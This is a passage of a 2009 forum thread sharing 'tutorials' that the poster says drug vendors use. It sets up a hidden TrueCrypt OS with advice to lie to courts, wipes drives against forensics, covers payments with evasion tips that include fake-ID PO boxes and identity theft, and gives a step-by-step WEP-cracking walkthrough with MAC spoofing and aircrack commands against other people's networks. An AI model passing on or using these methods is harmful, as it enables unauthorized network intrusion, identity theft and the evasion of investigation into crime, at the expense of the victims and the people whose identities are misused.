8. Move your mouse around as randomly as possible for about five or ten minutes. The longer and the more randomly you do this, the stronger the encryption will be. You may want to hide the numbers / letters after a bit, I guess. After five or ten minutes, click next.

9. Answer yes again to the same pop up. Another pop up will come up telling you the files on the partition behind your OS partition will be wiped clean. This shouldn't be an issue as you shouldn't have had anything on this partition yet anyways. If you did and you need to keep it, move it to your OS partition. Click Yes.

10. Click format and wait for it to finish.

11. Click next until you see the button that says to open the outer volume. Put some random fake-sensitive stuff in here, like porn or whatever. Click next.

12. Click next until it asks you to pick the algorithm for your hidden volume. Read post 7 from the above tutorial when selecting your algorithm. Again, stuck with Ripemd-160. Click next.

13. You must now select a new passphrase. Make this one very good and different from the other one you already made and the next one you are going to make. This is one that you can not give up with out screwing yourself. It should be at least twenty characters long and include letters, numbers, capitals, spaces and special characters. Click next.

14. Move your mouse around randomly again, for five or ten minutes. You may want to hide the numbers/letters in the random pool. After five or ten minutes, click next.

15. Click next until asked to enter a passphrase for your decoy operating system. This is another passphrase you can give up if you are ever forced to. And should actually be the first one you give up in court to get out of contempt. As always, you should push your luck and do a few days or weeks in jail first to see how serious they are about getting any passphrase at all. After typing in your sort of hard but easy to remember decoy passphrase, click next.

16. Move the mouse around gathering random data as usual. After five or ten minutes, click next. You may not want to have the matrix looking numbers / letters displayed.

17. Keep hitting next until it makes you create a rescue CD. Follow the instructions for this. You need a rescue CD and you should keep your rescue CD in a safe location. They can not decrypt the OS with out the passphrase even if they get the rescue CD but you should still keep it safe and hidden. I am not sure if they can tell if you have a hidden os or not from examining the rescue CD, but I doubt it can be done since the contents of the rescue CD are already on the first track of the hard drive decrypted.

18. Keep hitting next until asked about operating system cloning. Then hit Yes. Your current real OS (which should have no incriminating information on it!) will be copied to the hidden OS partition. You must restart. Also make sure the rescue CD is NOT in the drive at the point where you restart. Take it out and keep it out, stored in a safe location, probably best in a hidden location or a safe house but really this is truly probably not necessary .

19. After the reboot you will be asked for your hidden OS pass phrase. Type it in.

20. Now your regular OS will be copied to the hidden partition. This will take some time. After it is done, you will be prompted for your decoy system pass phrase. Type it in.

21. now you will be taken back to windows. In Truecrypt, you must now select to encrypt your decoy operating system (the OS you are currently using). This will also take some time.

22. Now that this is all done, you will be able to enter three passphrases when prompted to do so after boot:

A. Boot password for hidden operating system (NEVER EVER GIVE THIS UP TO ANYONE UNLESS THEY HAVE A GUN TO YOUR HEAD AND SAY EITHER GIVE US THREE PASSPHRASES OR YOU WILL DIE REGARDLESS OF IF YOU HAVE A HIDDEN OS OR NOT, YOU BETTER HOPE YOU DO OR YOU ARE DEAD ANYWAYS LOL)

B. Boot password for decoy operating system (You can give this one up if forced to, but it is still better to pretend you do not remember your passphrase and see if you are held in contempt of court. Once you are held in contempt, do as much time in jail as you possibly can manage to the full time saying you forgot your passphrase, and see if you ever get let out. If you can no longer stand it then suddenly remember your decoy passphrase and feel free to give that up)

C. Outer volume password (If you are forced to give up the password to the first partition, you can give this up. Again, forget it for as long as you can stand. After giving this up they still can not prove you have a hidden OS probably, I do still need to do more in depth reading of the article Sade posted to make sure)

23. After finishing, you must shut down your computer and leave it off for several minutes while the ram returns to a more random state. You can now boot on the computer and enter the password you want.

You should use the hidden OS for ALL things that are incriminating as well as randomly use it for things which are not incriminating but have no links to your personal life (random internet surfing, random listening to music or game playing, whatever). You should use the decoy OS for all things that are not incriminating. Try to use both of them about equally if at all possible.

NOTE: DO NOT WRITE TO THE HIDDEN VOLUME. THIS IS WHERE YOU PUT THE "FAKE" INCRIMINATING FILES. WRITING TO THIS COULD DAMAGE OR RUIN THE HIDDEN OS. YOU SHOULD JUST LEAVE IT ALONE AFTER PUTTING THE INITIAL FAKE INCRIMINATING FILES INTO IT.

Now you have no reason to turn off your computer if you get a surprise visit, unless you are inside your hidden OS. If you are in the decoy OS you can leave it on. If you are in the hidden os though, turn it off as quick as you can, even if that means you need to kick it down and make it power off.
Click to expand...

binary shadow · Apr 1, 2009

Hard drive anti-forensic wipes

DBAN

What it is

DBAN is a free and open source drive wiping program. It is used to fully erase all information off a hard drive. Deleting files on a hard drive only reallocates the space, it does not technically remove the files. Even when a hard drive is formatted it is still vulnerable to forensic analysis. Using a program like DBAN is a safe way to wipe the entire contents of a hard drive between projects, or even randomly every few months to provide a fresh start. It is also good to use in emergency situations that are not time sensitive (An expected visit versus a knock on the door). For secure removal of single files, Heidi eraser is suggested. DBAN is for entire hard drives.

What you need to get

First of all you will need a floppy, DVD or USB key to load the program to.

Secondly, you will need the actual program, which you can find here www.dban.org

Install it

1. Keep in mind that using DBAN will fully erase the contents of your drive in such a way that it will be virtually impossible to restore. With that in mind, the first step to running DBAN is creating a DBAN boot media. To do this, you will need to download either a DBAN .exe or a DBAN .iso . Both can be found at the following location: http://dban.sourceforge.net

2. If you plan on saving DBAN to a CD or a DVD, download the .iso, if you plan on saving DBAN to a floppy or USB, download the .exe file.

3. If you downloaded the .iso file, insert a blank CD or DVD into your burner, and write the ISO to the media. This can be accomplished with a variety of programs, ISOrecorder being one free program for windows XP.

4. If you downloaded the .exe file, insert a floppy disk or a USB thumb drive and run the .exe program. Simply follow the instructions to create the boot disk or drive.

5. You now have DBAN on a boot media. To run DBAN, boot from the media that it is installed on (for example, if you made a CD version of DBAN, insert the CD, restart your computer and set the CD drive to be the first boot media in BIOS, and then restart
again)

Using the program

1. DBAN will now start up after booting your computer. You will be presented with a screen asking if you would like to Auto Nuke or configure it yourself. You should opt to configure it yourself.

2. After opting to configure yourself, you will be taken to a new screen. Select the drives / partitions you wish to wipe here. Now you must select the algorithm and PRNG to use.

3. You should set the wipe method to “PRNG stream”.

4. You should set the PRNG to “Mersenne Twister”.

5. You should set the number of rounds to run to at least 8.

6. Now that all your settings are in place, run DBAN. It will take many hours to fully wipe your drive, but when it is done you can rest assured that the data on the drive is essentially impossible to retrieve.

The different methods of wipes and different prngs hold different benefits. I merely picked the oens that will probably be best suited for 99.9 percent of users. The DOD-7 pass wipe is the official wipe used by the department of defense on their hard drives before redeploying them. It is a solid wipe but was designed by the US government.

Gutmann wipe is very secure on old hard drives, on newer hard drives it just takes longer. An 8 pass PRNG wipe is going to offer the same level of protection on modern drives and take a tenth of the time.

The DOD short is also used by the government for wiping drives that contain classified information below top secret (which the 7 pass is used for).

Mersenne Twister PRNG is much stronger than the alternative option (I can't remember the name off the top of my head, is it a -160 bit prng? I think so). I do remember though that mersenne is better are generating random numbers, and the alternative is better at standing up against crytanalysis. But I think very random numbers are a better advantage.
Click to expand...

binary shadow · Apr 1, 2009

Payment Systems (credit to author who probably wishes to stay anonymous, edited moderately by me for accuracy, they made a few mistakes I think I got them all though):

WesternUnion/MoneyGram

Description: WesternUnion(WU) and MoneyGram(MG) are probably the most popular payment methods, however they both have major security risks and should be avoided unless absolutely no secure option is available.

For The Receiver

Info:
* Countries: All
* ID: Varies by country/state. In most US states you can pick up to $999 without ID.
In the UK any amount requires ID to pickup. over 600gbp will require 2 forms of ID.

* Fees: The sender pays all fees.
* Pickup Options: Can be picked up at any WU/MG location, see below for details

To pick up funds, have the sender send the cash and then send you the first name, last name, city/country, and MTCN (or ref# for MG). If there is a test question you (may not) need to show ID depending on where you are.

For The Sender

Info:

* Countries: All
* ID: Varies on the country/state; most places let you send up to $999 or 600gbp without ID.

* Fees: Varies on amount. Around 10-20% Can be checked on their website
* Funding Options: can be sent from any WU/MG location, see below for details

To send money find a location from the links below, go down with cash and the senders first name, last name and city and you will be able to send it. You should also check the ID requirements for your location before going down.

How they can catch you:

WU/MG locations often have cameras, the forms you fill out are also specifically designed to catch fingerprints. If you repeatedly pick up money from the same location they could wait until you receive a new payment and do a stake out to catch you in the act. Or if a case was ever brought against you they would have video and fingerprint evidence showing you picking up the cash. Best bet is to find a place without cameras & wear a hat and gloves.
Click to expand...

Ecurrency

Description: Ecurrency is by the far most secure payment method. Ecurrency can be bought and cashed out completely anonymously. (Cashing out is a bit tricky though!)

For The Receiver

Info:

* Countries:All
* ID: Most exchangers require some sort of ID, however if you look hard enough you will find one that doesn't
* Fees: Depends on the exchanger usually 4-20%
* Funding Options: Depends on the exchanger; usually WU/MG, Bank Deposit, Money Order, CC, CIM,etc

You can obtain ecurrency completely anonymously and for a low fee is you look in the right places.

For The Sender

Info:

* Countries: All
* ID: Depends on the exchanger.
* Fees: Depends on the exchanger usually 0-20%
* Withdrawal Options: Usually WU/MG, CIM, Bank Transfer, Anonymous ATM cards

Cashing out anonymously is very hard, however even if you decide to use WU/MG it secures you from dea set-up operations as you aren't giving the customer your information, only the exchanger.

How they can catch you:

If you do everything right, it would require extensive investigation and international cooperation to catch someone using e-currency.
Click to expand...

Paypal/Alertpay

Description: PayPay/AlertPay is probably the easiest way to send money, but also the least secure. You should only be using PayPal for items that are legal. The best thing about this method is that you can get your money refunded if you're scammed.

For The Receiver
Info:

* Countries: All
* ID: Must be tied to a CC or Bank account to fund.
* Fees: free to cash out.
* Funding Options: Funded with CC or Bank Transfer

Insecure since your account needs to be tied to a valid bank account.

For The Sender

Info:

* Countries:All
* ID: Must be tied to CC or Bank account to withdraw or send to another account
* Fees: Small fee on transfers (a few dollars)
* Funding Options: CC

Insecure as it needs to be tied to a cc and not recommended.
Click to expand...

CIM

Description: This method is not one I'd suggest. If you send the letter non-recorded this may happen to you a) the vendor claims it never arrived. b) the postman recognizes the address as it gets a lot of money to it and simply pockets the envelope. Even if it is sent recorded there is a possibility that it will not arrive, I have had recorded packages never show. Also if you are a vendor receiving money make sure you have a PO box set up with a fake ID or an abandoned house.

For The Receiver

Info:

* Countries: All
* ID: You will need a fake ID and possibly a utility bill to set up a PO box. You may also need to show ID if the packet is recorded or is too big to fit in the PO box itself.
* Fees: None
* Funding Options:

Make sure you have a PO box set up with a Fake ID.

For The Sender

Info:

* Countries: All
* ID: None
* Fees: None other than currency conversion
* Funding Options:

Your envelope could easily be lost, if you send it tracked make sure there is someone at the receiving end to sign for it.

How they can catch you:

The police could do a steak-out at the PO location, they cannot do 24/7 manned surveillance but most likely they will have your picture (either from cameras or the picture on your fake ID). Get items tracked and if anything fishy happens (held in customs) forget about the package, at least for 6mo or so.
Click to expand...

MoneyPak/Greendot

Description: I'm not 100% sure on this as I'm not from America. But from what I can understand, to withdraw MoneyPak/Greendot your card needs to be tied to a legit SSN (the will only send the card to matching credit report of that SSN) so you will need to commit identity theft to cash out with this method.

For The Sender

Info:

* Countries:USA
* ID: No ID required
* Funding Options: You can buy the card at Walmart or Walgreens
* Fees: $9.95 is the initial cost of the card (can be reused)

In order to get the card you need someones Real Name, Date of birth, SSN, and it also needs to be shipped to a address. When withdrawing money you should wear a mask as it'll be recorded. Best bet is use a friends identity, if worse comes to worse they can just say someone stole their information (as they will not be linked to the RC scene)

For The Receiver

Info:

* Countries: USA
* ID: SS and valid house address needed to receive money.
* Fees: $4.95 per card (the card cannot be reused)
* Withdrawl Options: You can withdraw at ATMs

Sending money is fairly anonymous, however receiving money is impossible to do with out committing identity theft.

Since the receivers card has to be tied to a valid SSN the only safe way to get this card requires identity theft.
Click to expand...

Cashiers Cheques/Postal Orders

Description: A Money Order is just like a cheque. You can buy them at several places such as convient stores, post offices, banks. Some places have limits and it's usually $500 or $1k. Anymore than that and you'll need a Cashier's Cheque. A Cashier's cheque is identical to a Money Order but are for larger amounts. These work the same way but can only be bought and withdrawn at banks.

For The Receiver

Info:

* Countries: Domestic
* ID: You will most likely need ID to pickup and will be recorded on camera.
* Fees: Only a few dollars, $500 limit.
* Funding Options: Can be funded with cash via Banks, Post of offices, etc

You buy the money order with cash at a post office, bank, etc and then mail the Money Order to the vendor. A Cashier's cheque is identical to a Money Order but are for larger amounts. These work the same way but can only be bought and withdrawn at banks.
if it's lost you can get your money back if you have the receipt).

For The Sender

Info:

* Countries:
* ID:
* Fees:
* Funding Options:

How they can catch you:

For the sender: This carries the same difficulties as WU/MG - most likely cameras and finger print sensitive documents at the sending location. For the receiver: You need to give out a physical location to get the moneyorder, so this carries the same danger as CIM + you need to go to a establishment and usually show ID to cash out.
Click to expand...

Click to expand...

binary shadow · Apr 1, 2009

Cracking WEP WiFi Encryption (credit to author above, again edited heavily by me as it seems he didn't understand some of the variables, I think it is accurate now heh):

Download backtrack bootable from here: http://www.remote-exploit.org/backtrack_download.html

I recommend The BackTrack Bootable 3 iso.

I did not write this tutorial, I simply copied it off the youtube video so I could print it out and use it at a friends house with no internet. I recommend you watch the youtube video here and it'll help you understand what you're doing: https://www.youtube.com/watch?v=oHq-cKoYcr8

Download the iso, burn the image to a disk and boot from it.

Making sure your wireless card is compatible.

click the item furthest to the left on the taskbar. Go to Internet > Wireless Assistance. And do a scan, if it finds some networks you have a pretty good chance of it being compatible.

Let's get started!

Open up a 'shell'. (This is the black terminal icon on the left-hand side of your taskbar) To find out which wireless card you're using type: airmon-ng

You should see "wlan0" if your wireless card is named something else replace wlan0 with your wireless card name in this tutorial.

Now type: airmon-ng stop wlan0

the next line should read along the lines of: wlan0 (chipset) (monitor mode disabled)

Now type: ifconfig wlan0 down

hit enter and then type: macchanger --mac (target computers mac address if you can find it, if not bullshit a fake one so it can't trace back to you) wlan0

Your MAC should now be 'Faked'. Now we turn the wireless card back on by typing: airmon-ng start wlan0

This should take 10-15 seconds. It should come up and say "(monitor mode enabled)" if something else comes up, some sort of error; this means your wireless card is uncompatible, sorry try another computer or wireless card.

Step 2

Now type: airodump-ng wlan0

As soon as it finds the wireless network that you want to crack - stop the search by hitting CTRL+C. The encryption on the network you're trying to crack should read WEP. If it reads WPA or anything else you wont be able to crack it using this tutorial.

Now type: airodump-ng -c (channel) -bssid (BSSID) wlan0

replace the parts in bold with the channel and bssid of the network you're trying to crack. This should be above in the list that airodump just spat out at you. The "#Data" field should be getting higher. We need this number to be at 10,000 before we can crack. It's probably going slow at the moment so we need to speed it up!

Speeding it up

open up a separate shell. Type in: aireplay-ng -1 0 -a bssid -e essid wlan0

again, replace the fields in bold with the appropriate values. (make sure the essid is in the correct case). It should come up "Association Successful " if this does not come up, you are too far away from the base of the wireless network.

Now to provoke it, type: aireplay-ng -3 -b (bssid) wlan0

The #Data field should now climb steadily to 10k. Now you can minimize this shell and let it run in the background.

Now to crack the WEP, open a new shell. type: aircrack-ng -n 64 -b (bssid) wep123-01.cap

. The decrypted password should appear now!
Code:

KEY FOUND!: [xx:xx:xx:xx]

the x's without the colons is your decrypted password!
Click to expand...

Tanman35 · Apr 1, 2009

wow awesome work doing all that and putting it together im pretty sure this deserves a sticky

xblayde · Apr 2, 2009

I'd like to second that.

Benji2 · Apr 3, 2009

some decent info. Although there are better ways of doing things IMO, I will post my ideas (which have been well established). And as we all know GPG isnt the golden key we all though. In a few days I will provide you all with complete anon from any illegal activity one may or may not shoose to partake in ( I ADVISE AGAINST IT) BUT IN THE SAKE OF HARM REDUCTION i WILL POST. PEACE (SORRY FOR CAPS LOCKS) HAHA

binary shadow · Apr 3, 2009

GPG is pretty much the safest way to communicate short of complicated symmetric schemes (where asymmetric encryption like GPG would still be used for key exchange), OTR messaging which is for IMs not e-mails or elliptic curve asymmetric schemes which are totally not user friendly for the majority of people.

GPG offered by third party services like Hushmail is worthless, unfortunately it took most people a long time to realize this. Hushmail lead to the biggest steroid bust in the entire history of the world when they tapped online vendors E-mail accounts, look up operation Raw Deal. But GPG used by an individual, not run by a third party for an individual, is incredibly safe. There are some sophisticated attacks that can weaken and in some cases break it, such as a quantum computer could break GPG encryption if quantum computers exist (although a quantum computer couldn't break symmetric encryption such as truecrypt). But in a realistic scenario GPG will make your communications immune from being wire tapped. Even in a symmetric communications scheme you need to use asymmetric encryption for key distribution so you can never fully protect yourself from all possible cryptanalysis attacks, but realistically unless you are a foreign military or in a spy ring and being targeted by the NSA or some such thing GPG is more than adequate encryption if you use enough bits in your key (I suggest 4,096). ECDH would be better than the algorithms offered by gpg (RSA/Elgamal by default) but I know of no beginner friendly system that supports ECDH or any other elliptic curve asymmetric encryption schemes. Most people have enough trouble with GPG ;-).

I am interested to see your guidelines. The methods I listed here are used by the majority of vendors I know and seem to work well so far, but always open to improvements =-).

Log in or Sign up

Massive tutorial collection

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

Tanman35 Member

xblayde Member

Benji2 Member

binary shadow Visitor

Share This Page

Log in or Sign up

Massive tutorial collection

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

binary shadow Visitor

Tanman35 Member

xblayde Member

Benji2 Member

binary shadow Visitor

Share This Page

Useful Searches